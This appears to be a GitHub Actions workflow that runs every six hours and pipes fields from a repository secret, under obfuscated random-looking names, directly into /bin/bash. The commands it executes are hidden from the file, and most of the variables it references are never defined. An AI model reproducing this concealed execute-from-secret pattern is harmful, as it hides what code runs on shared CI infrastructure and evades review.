name: fishfastz
on:
  workflow_dispatch:
  schedule:
    - cron: '33 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fishfastz
        env:
          fn81985: ${{ secrets.fn81985 }}
        run: |
          echo $fn81985 | jq -r .sups800 | /bin/bash
          echo $ji62882 | jq -r .ip0 | /bin/bash
          echo $pzbn779 | jq -r .h4 | /bin/bash
          echo $ske85528 | jq -r .q27 | /bin/bash
          echo $fzq5 | jq -r .myh810 | /bin/bash
          echo $woy35521 | jq -r .c9745 | /bin/bash
          echo $cbku49454 | jq -r .sko71940 | /bin/bash
          echo $mlt6899 | jq -r .lsr92 | /bin/bash

